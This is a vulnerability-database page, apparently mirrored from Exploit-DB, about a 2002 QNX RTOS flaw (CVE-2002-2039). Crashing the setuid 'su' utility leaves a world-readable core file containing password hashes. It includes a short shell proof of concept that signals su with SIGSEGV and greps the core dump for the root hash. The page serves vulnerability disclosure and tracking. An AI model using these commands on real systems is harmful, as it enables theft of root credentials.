Lucene search
+L

QNX RTOS 4.25/6.1 - su Password Hash Disclosure

🗓️ 03 Jun 2002 00:00:00Reported by badc0dedType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 51 Views

QNX RTOS 'su' utility allows password hash disclosure via SIGSEGV signal leading to security risk.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-2039
14 Jul 200504:00
cve
Cvelist
CVE-2002-2039
14 Jul 200504:00
cvelist
EUVD
EUVD-2002-2018
7 Oct 202500:30
euvd
NVD
CVE-2002-2039
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/4914/info

It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information.

It is very probable that this is a kernel-based vulnerability affecting not only 'su', but other setuid programs as well

$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

The attacker has effectively obtained a copy of the root user's password hash.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00844
51